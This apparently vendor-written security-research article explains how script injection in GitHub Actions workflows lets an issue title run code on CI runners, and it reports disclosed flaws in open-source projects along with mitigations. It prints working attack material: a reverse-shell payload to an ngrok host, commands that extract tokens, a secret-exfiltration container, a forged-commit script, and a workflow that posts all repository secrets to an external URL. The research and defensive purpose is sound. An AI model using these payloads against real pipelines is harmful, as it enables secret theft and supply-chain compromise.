How We Discovered Vulnerabilities in CI/CD Pipelines of Popular Open-Source Projects

user profile
Head of Security Research

The upsurge of supply-chain incidents in recent years highlights the importance of protecting build servers and deployment processes. In the case of GitHub Actions, GitHub has implemented many security features for their hosted runners – isolation, ephemeral environments, golden images, and more. Yet, we will demonstrate in this article that innocent mistakes in writing pipelines could compromise the entire source code and cause potential supply-chain incidents even when it runs in isolated build environments.

Executive Summary

Cycode discovered critical vulnerabilities in several popular open-source projects, each of which can cause a supply-chain attack through the CI process. We found the vulnerabilities in misconfigured GitHub Actions workflows. They were missing proper input sanitizing, allowing malicious actors to inject code into the builds through issues and comments, and to access privileged tokens.

Out of dozens of vulnerable repositories we found and reported, the most popular were:

  • Liquibase – Track, version, and deploy database schema changes. Applied fix – 3278525.
  • Dynamo BIM – A visual programming tool that is sponsored by Autodesk. Applied fix – disabled the workflows.
  • FaunaDB – Transactional database delivered as a secure and scalable cloud API with native GraphQL. Applied fix – ee6f53f.
  • Wire – An open-source communication platform. Applied fix – 9d39d6c.
  • Astro – Static site builder. Applied fix – 650fb1a.
  • Kogito – A business automation technology that is sponsored by Red Hat. Applied fix – 53c18e5.
  • Ombi – A popular media request tool. Applied fix – 5cc0d77.

Summing up the users of these tools, these vulnerabilities can impact millions of potential victims.

We responsibly disclosed these vulnerabilities to the organizations and the maintainers, and they fixed them quickly. We didn’t find any signs of prior exploitation of the vulnerable workflows.

Note: These aren’t vulnerabilities in GitHub Actions infrastructure but in misusing workflows and not applying best practices. Such vulnerabilities could also be found in private GitHub repositories.

Article Outline

Cycode is a leader in software supply chain security solutions, and it is our responsibility to increase the awareness and educate around security issues in code and build systems. Apart from reporting these vulnerabilities, we want to share with the community our journey through the research and elaborate on the following topics:

  • What is the GitHub Actions platform, and what makes it a powerful build system.
  • Explaining GitHub Actions security concepts, including how you can leverage misconfiguration such as the ones we found into code execution.
  • Diving into GitHub Actions internals to understand what malicious actors could achieve with code execution on the runners.
  • Describing possible mitigations for such vulnerabilities and best practices for developers and DevOps teams using GitHub Actions.

Background

For most of its history, GitHub was all about storing source code. In 2018, they announced that they are going in a different but related direction by launching GitHub Actions – a CI/CD platform allowing GitHub developers to automate development workflows easily. Since then, GitHub Actions have become extremely popular mainly due to its marketplace, containing more than 11 thousand actions, and free hosted runners for public repositories.

Any repository on GitHub can add YAML files (called workflows) in the .github/workflows path, and once certain events occur, it will run your jobs. For example, the following workflow dictates that each repository push will run code that prints “Hello World!”.

name: GitHub Actions Demo

on: [push]

jobs:
 Actions-Hello-World:
   runs-on: ubuntu-latest
   steps:
     - run: echo "Hello World!"

Like every continuous integration system, its usages may vary. Sample workflows could be:

  • Building the code into a container and uploading it to the chosen registry.
  • Scheduled tasks that scan vulnerabilities in code.
  • Running tests for forked pull requests.
  • Automatic labeling for issues.
  • Sending issues to ticket handling system (Jira/Monday/Asana/etc.).
  • Supporting automatic merges for PR created by external bots.
  • And more.

GitHub Actions Security

GitHub runner is an environment running this open-source code that connects to a personal account or an organization and listens to the workflow queue.

GitHub allows the developers to either set up their runners on self-hosted machines, or the more popular method, on GitHub-hosted machines. While in the former case, GitHub is limited in providing security measures, in the latter case, they explain that each job in your workflow will run on a completely clean virtual machine with pre-built tools depending on the selected operating system.

As explained here, before the runner receives anything, it needs to be authorized to run jobs for that specific user/organization. It then gets a valid OAuth JWT token, which is saved in .credentials file and utilized to receive jobs from GitHub Actions service API.

Apart from the OAuth token, at the start of each workflow run, GitHub automatically creates a unique GITHUB_TOKEN, which is used to authenticate and access GitHub resources (code, PR, issues, and more). While for forked repositories, this token is limited to only read permissions, for any other event, it has default read and write capabilities. When the job starts, this token is passed to the runner, passing it to any subprocess it creates securely and is never persisted on the machine.

This GitHub runner environment introduces three main risks which we will tackle in this article:

  • A malicious actor committing undesired code into the repository can cause a critical supply chain incident as an attacker can introduce backdoors deployed to end-users or organization environments. To achieve this, an attacker would need to fetch sensitive tokens with write permissions for that repository. This could be done by utilizing the GITHUB_TOKEN created for that workflow or any other PAT (Personal Access Token).
  • A malicious actor could exfiltrate workflow secrets and, in some cases, also repository or organization secrets. These secrets could be tokens for private repositories, container registries, cloud assets, or any other sensitive information.
  • A much smaller risk would be the malicious actor’s ability to run botnets or crypto miners using your runner infrastructure.

To help us configure the runners properly, GitHub supplies extensive best-practice documentation. By going over this document, we understand that many security pitfalls await developers building these workflows – vast enough that even popular repositories with tens of thousands of stars fail to implement. This is how our research started.

Issue Injection 101

Let’s take the following workflow as an example:

name: Issues

on:
  issues:
    types: [opened]

jobs:
  print_issue_title:
    runs-on: ubuntu-latest

    name: Print issue title
    steps:
    - run: echo "${{github.event.issue.title}}"

This sample workflow will print the issue name on each created issue in the repository. At first sight, it looks innocent, but what will happen if we open an issue with the following title: new issue title" && ls / && echo "?

Github Actions

We managed to run the ls / command on the hosted runner!

The GitHub service which dispatches these workflows to the hosted runners replaces the macros ${{ ... }} blindly, so echo "${{github.event.issue.title}}" becomes echo "new issue title" && ls / && echo "", thus, giving us arbitrary code execution capabilities.

In addition, the default GITHUB_TOKEN created for this event has read/write access to the repository and potentially allows us to commit changes to it.

So far, we have given you a brief background on GitHub Actions security and how a malicious actor can inject a controlled code into a privileged build pipeline. Let’s dive deeper into how the risks mentioned above can be materialized through deep dive into GitHub runner internals.

Diving into GitHub Actions Runner

Security Limitations in GitHub Runners

As part of the security model that GitHub implemented, not everything is achievable as an attacker, even with code execution capabilities. We will list some of the main limitations:

Clean workspace per job – each new job (each workflow may contain several jobs) will run on a clean, VM isolated instance. On the one hand, persistence in the runner can affect subsequent steps, but on the other hand, persistence will affect the currently running job only.

Secrets are passed per step – each workflow job contains one or more steps; these steps, which may contain secrets, are transferred to the runner just before the execution. This means that if subsequent steps don’t run for any reason, their secrets won’t be reachable to the runner.

Permissions for GITHUB_TOKEN – We explained previously that at the start of each workflow run, GitHub creates a new GITHUB_TOKEN with the appropriate permissions (explained here). The token permissions could be altered by either adding the permissions: line in the workflow file or through the organization configuration. In addition, this token has several limitations; for example, it can’t edit repository workflow files.

Github Actions

Exploring the runner through arbitrary code execution

Based on our experience with the vulnerabilities we found, we built an intentionally vulnerable workflow to investigate how a malicious actor could exploit it to his needs. We will use this workflow frequently along with the article.

name: Demo vulnerable workflow

on:
  issues:
    types: [opened]

env:
  # Environment variable for demonstration purposes
  GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

jobs:
  vuln_job:
    runs-on: ubuntu-latest

    steps:
     # Checkout used for demonstration purposes
      - uses: actions/checkout@v2
    
      - run: |
         echo "ISSUE TITLE: ${{github.event.issue.title}}"
         echo "ISSUE DESCRIPTION: ${{github.event.issue.body}}"

      - run: |
         curl -X POST -H "Authorization: Token ${{ secrets.BOT_TOKEN }}" -d '{"labels": ["New Issue"]}' ${{ github.event.issue.url }}/labels

This workflow does a simple task – whenever a new issue is created, it will check out the code, print the issue details to the log, and label it as “New Issue” using a PAT.

As we previously explained, the line echo "ISSUE TITLE: ${{github.event.issue.title}}"  is vulnerable to command injection. To explore the capabilities of our post-exploitation on the runner machine, we will create a simple reverse shell using a ngrok.

First, we initiate ngrok by running ngrok tcp 10000 on our machine; second, we run a local Netcat listener with nc -lv 10000 and use the ngrok endpoint, for example, 8.tcp.ngrok.io:15063 in our payload.

So our payload would be creating a new issue with the following name:

New malicious issue title" && bash -i >& /dev/tcp/8.tcp.ngrok.io/15063 0>&1 && echo "

Github Actions

Github Actions

We are running a reverse shell inside the runner!

Note: this demonstrates exploitation techniques for when the runner is Ubuntu-based. With a few tweaks, it could work on windows-based and Mac-based machines.

While exploring the runner, we could find several interesting things:

  • In the runner folder /home/runner/runners/2.287.1, we could see a .credentials file containing the OAuth JWT token used for receiving jobs from the GitHub Actions service.
$ cat /home/runner/runners/2.287.1/.credentials

{"data":{"token":"REDACTED"},"scheme":"OAuthAccessToken"}
  • That folder also contains a .runner file that helps to authenticate and receive the right jobs.
$ cat /home/runner/runners/2.287.1/.runner

{
  "AgentId": "1",
  "AgentName": "Hosted Agent",
  "PoolId": "2",
  "ServerUrl": "https://pipelines.actions.githubusercontent.com/REDACTED/",
  "SkipSessionRecover": "True",
  "IsHostedServer": "True",
  "workFolder": "_work",
  "WorkFolder": "/home/runner/work",
  "MonitorSocketAddress": "127.0.0.1:49100"
}
  • By looking at the relevant processes using ps -aux | grep runner and combining the previous knowledge, we could deduce the execution flow of the runner: 
    • The runner process is being provisioned by some .NET executable called provisioner. It provisions the Runner.Listener executable, which uses the OAuth credentials to fetch the job from the GitHub Actions service.
    • Once Runner.Listener fetched a job, it creates the Runner.Worker and passes it job information, including GITHUB_TOKEN through an IPC.
    • Once the Runner.Worker received a run command, it writes the shell script to the disk and runs it through bash
root         664  0.8  1.2 3684004 85660 ?       Ssl  17:53   0:02 /opt/runner/provisioner/provisioner --agentdirectory /home/runner/runners --settings /opt/runner/provisioner/.settings
runner      1391  0.9  1.4 3639900 102872 ?      Sl   17:54   0:02 /home/runner/runners/2.287.1/bin/Runner.Listener run
runner      1410  1.6  1.6 3674340 114088 ?      Sl   17:54   0:03 /home/runner/runners/2.287.1/bin/Runner.Worker spawnclient 112 115
runner      1512  0.0  0.0   8704  3440 ?        S    17:54   0:00 /usr/bin/bash -e /home/runner/work/_temp/39dda61c-1cea-4106-b28e-ec9a4f223df2.sh
  • The ~/work/_temp/_github_workflow/event.json file contains complete information regarding the triggered event for the workflow.
  • The ~/work/_actions folder contains all dependent actions we run. For example: ~/work/_actions/actions/checkout/v2 includes all the checkout action source code.

Extracting Secrets from the Workflow

Secrets in environment variables

In the sample workflow above, we defined GITHUB_TOKEN as an environment variable for the entire job. We can fetch its content quickly and abuse it for malicious means in such cases:

$ env | grep GITHUB_TOKEN 

GITHUB_TOKEN=ghs_REDACTED

If the environment variable was defined on the step level, it would be accessed only in that step it was described. This could make it harder to fetch the secrets, but it is possible for advanced attackers, as we’ll show soon.

Secrets from checkout action

Checkout is one of the most popular actions in the marketplace. To put it simply, it does git clone to your repository using your GITHUB_TOKEN as a default value.

In its default behavior, it also saves the credentials in the .git/config file. Due to that action usage, we can easily extract the GITHUB_TOKEN in our example.

$ cat $GITHUB_WORKSPACE/.git/config | grep AUTHORIZATION

extraheader = AUTHORIZATION: basic REDACTED

$ cat $GITHUB_WORKSPACE/.git/config | grep AUTHORIZATION | cut -d':' -f 2 | cut -d' ' -f 3 | base64 -d 

x-access-token:ghs_REDACTED

Secrets in run scripts

If we peek at the $RUNNER_TEMP directory, which maps to /home/runner/work/_temp, we’ll notice that each run step appears as a separate shell file.

total 20K
drwxr-xr-x 4 runner docker 4.0K Feb 21 17:54 .
drwxr-xr-x 6 runner root   4.0K Feb 21 17:54 ..
-rw-r--r-- 1 runner docker  132 Feb 21 17:54 39dda61c-1cea-4106-b28e-ec9a4f223df2.sh
drwxr-xr-x 2 runner docker 4.0K Feb 21 17:54 _github_workflow
drwxr-xr-x 2 runner docker 4.0K Feb 21 17:54 _runner_file_commands

These shell files contain the run scripts defined in the workflow definition. In our case, the only shell file written is the one that was vulnerable to the injection attack:

$ cat $RUNNER_TEMP/39dda61c-1cea-4106-b28e-ec9a4f223df2.sh 

echo "ISSUE TITLE: New malicious issue title" && bash -i >& /dev/tcp/8.tcp.ngrok.io/15063 0>&1 && echo "" 
echo "ISSUE DESCRIPTION: "

So this means that if ${{ secrets... }} were used inside a run command, we’d be able to see these secrets as plain text by inspecting these files. In our example, we didn’t have any past run commands with secrets, but there is one future command which contains BOT_TOKEN secret.

So how can we fetch that future secret? We create persistence. All subsequent steps are running on the same machine, so we need to log any new file created in the $RUNNER_TEMP folder.

One possible implementation for this could be a simple Python script using the watchdog package to monitor changes to folders. For each newly added shell file, the script will send it to a controlled server via a POST request. To ease its deployment, this script could be built into a container and be run easily in the runner through Docker.

To demonstrate this capability, we tried running it in our lab environment in the following way:

  • Creating and deploying in our lab a Python server that records all POST requests.
  • Creating a Python script that records modified shell scripts in a directory and sends them to a designated server.
  • Packing the malicious script into a docker container.
  • Running the container image in a detached mode:
sudo docker run --rm -d -v /home/runner/work/_temp:/app/monitored $DOCKER_USERNAME/actionmonitor $LAB_URL
  • Once we continue and exit the shell, we receive the secret from the subsequent run command:
INFO:root:POST request,
Path: /
Headers:
Host: REDACTED
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 316
Content-Type: multipart/form-data; boundary=c02346046d63dd9df9d114fa5cd7f1f2


Body:
--c02346046d63dd9df9d114fa5cd7f1f2
Content-Disposition: form-data; name="upload_file"; filename="71d7557f-0295-4ef5-972a-b3ba3b7ccc24.sh"


curl -X POST  -H "Authorization: Token ghp_REDACTED" -d '{"labels": ["New Issue"]}' https://api.github.com/repos/REDACTED/demo/issues/6/labels


--c02346046d63dd9df9d114fa5cd7f1f2--

Additional advanced methods to exfiltrate secrets

Once we have complete control of the runner, we also have full control over its subsequent operations, whether bash commands, passing secrets through environment variables, or external actions.

This means that if secrets were passed to actions, explicitly or implicitly (through default value), we can record them and use them maliciously. A POC code for this behavior is out of this article’s scope, but we can share some possible methods to achieve this behavior:

  • Some secrets, including input variables, are passed through environment variables. Recording all created processes and exfiltrating their environment variables could also achieve that goal.
  • All subsequent steps, including environment variables and input for additional actions, are sent to the runner through the network. We can record all the network traffic and extract sensitive information.
  • We can create an additional runner listener using the previously mentioned OAuth credentials. With the right timing, our runner could potentially receive the same job again from the start. We can record the complete job information by either listening to HTTP traffic or by intercepting the IPC communication and extracting the GITHUB_TOKEN for this new job.
  • It should be possible to research the memory layout of the Runner.Worker process and extract GITHUB_TOKEN from there.

Committing Malicious Code to the Repository

The most significant possible impact of these vulnerabilities is the ability to affect millions of end-users by inserting malicious changes into the repository without notice, as happened in codecov and SolarWinds.

In our example, we already had a prepared git environment because we were using the checkout action, but we could also set it up using GITHUB_TOKEN or any other access token. We prepared the following simple script to demonstrate how easily a code could be committed to the repository:

#!/bin/bash


# File to commit
FILE_URL_PATH_TO_COMMIT=$1
# Repository path where to commit
PATH_TO_COMMIT=$2


COMMIT_NAME="Maintainer Name"
COMMIT_EMAIL="maintainer@gmail.com"
COMMIT_MESSAGE="innocent commit message"


# Fetching the file
curl $FILE_URL_PATH_TO_COMMIT -o $PATH_TO_COMMIT --create-dirs


# Commiting to the repo
git add *
find . -name '.[a-z]*' -exec git add '{}' ';' # Adding hidden files
git config --global user.email $COMMIT_EMAIL
git config --global user.name "$COMMIT_NAME"
git commit -m "$COMMIT_MESSAGE"
git push -u origin HEAD

This script could be run manually in the reverse shell (as shown below) or easily automated. Let’s run it by giving it a remote file URL to commit, and the desired path:

$ curl -o /tmp/script.sh $SCRIPT_URL 

$ chmod +x /tmp/script.sh 

$ /tmp/script.sh $MALICIOUS_FILE_URL innocent_file.txt  
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed 
100     5  100     5    0     0    333      0 --:--:-- --:--:-- --:--:--   333 
[main 196e93a] innocent commit message 
 1 file changed, 1 insertion(+) 
 create mode 100644 innocent_file.txt 
To <https://github.com/REDACTED/REDACTED>   
    ff7a7fd..196e93a  HEAD -> main 
branch 'main' set up to track 'origin/main'.

When we look at our vulnerable repository, we’ll notice the commit made by “Maintainer Name”, as indicated in the script.

Github Actions

Sophisticated attackers could further enhance this capability and hide their traces by altering the git tree so the commit won’t be in plain sight.

Extracting Repository and Organizational Secrets

Attackers could apply additional methods to exfiltrate repository and organizational secrets other than the ones of the workflow by creating a new workflow.

Note: by default, GITHUB_TOKEN doesn’t have permission to push into the .github/workflows directory; hence, this method applies only if the attacker gets a personal access token or GitHub App token with workflow permissions.

A sample method for such attack would be creating a workflow similar to the one below and running it through GitHub API by giving it server URL as an input.

name: Secrets

on:
 workflow_dispatch:
   inputs:
     url:
       required: true

jobs:
 build:
   runs-on: ubuntu-latest

   steps:
     - run: |
         echo "${{ toJSON(secrets) }}" > .secrets
         curl -X POST -s --data "@.secrets" ${{ github.event.inputs.url }} > /dev/null

Once you commit the workflows using the methods we showed above, you can run it by using the following GitHub API:

curl -X  POST -d '{"ref": "<REF>", "inputs": {"url": "<SERVER_URL>"}}' -H "Authorization: Token ghp_REDACTED" https://api.github.com/repos/<USER>/<REPO>/actions/workflows/<WORKFLOW_ID>/dispatches

Running this action will send all repository and organization secrets that the access token has permissions, including those that weren’t appearing in the workflow. So, when we look at our lab server, we can see these secrets:

{  
    github_token: ghs_REDACTED,  
    SECRET1: secret_value
    SECRET2: another_secret_value,  
}

Mitigations

We will present several methods by which you can protect your workflows and deny the techniques we demonstrated above.

Avoid run steps and use external actions instead. For example, instead of running curl for updating a comment, you can use peter-evans/create-or-update-comment that does it for you. Dependent actions are less prone to script-injection attacks and are favored.

Sanitize your input using environment variables. In our example, if we declared the unsafe input using an environment variable, we weren’t vulnerable to the attack. The safe approach looks like the following:

     - env:
         TITLE: ${{github.event.issue.title}}
         DESCRIPTION: ${{github.event.issue.body}}

       run: |
         echo "ISSUE TITLE: $TITLE"
         echo "ISSUE DESCRIPTION: $DESCRIPTION"

Limit your GITHUB_TOKEN permissions. We want to overwrite the default permissions of the token to the minimum needed for the workflow’s operation. We can do that using the permissions tag in the workflow file. For example, permissions: read-all will give your token read-only permissions.

Limit your PAT/GitHub Apps token permissions. When GITHUB_TOKEN isn’t sufficient, additional tokens could be used to automate processes. These tokens could be more permissive than GITHUB_TOKEN and thus should be limited accordingly.

Limit the exposure of your secrets. When you create organizational secrets, it’s better to set the exact repositories that will use them.

Github Actions

Require approval for all outside collaborators. The default behavior is to require manual approval for first-time contributors. In that case, an attacker could create a simple and innocent pull request (like documentation update). When accepted, his subsequent pull request could be malicious and automatically trigger the workflow. So “Require approval for all outside collaborators” brings a more robust defense.

Github Actions

Conclusion

Unlike many vulnerability disclosures in the InfoSec industry, most of our reported vulnerabilities were fixed on the same day we reported them. It emphasizes the dissonance between the potential exploitation damage such an innocent mistake could have and how easy it is to fix it.

Your build systems, and especially GitHub Actions workflows, are critical paths in your software deployment – it can affect the final artifacts shipped to users, contains sensitive secrets like cloud tokens, and should be protected accordingly with security reviews, best practices, and by using external tools like Cycode’s platform.

How Can Cycode Help You?

Cycode’s platform secures your software supply chain by providing complete visibility into enterprise DevOps tools and infrastructure. With a simple GitHub integration, Cycode’s platform will detect the vulnerabilities mentioned above and additional configuration issues in your GitHub Actions workflows and help you remediate them. Such violations will look like the following: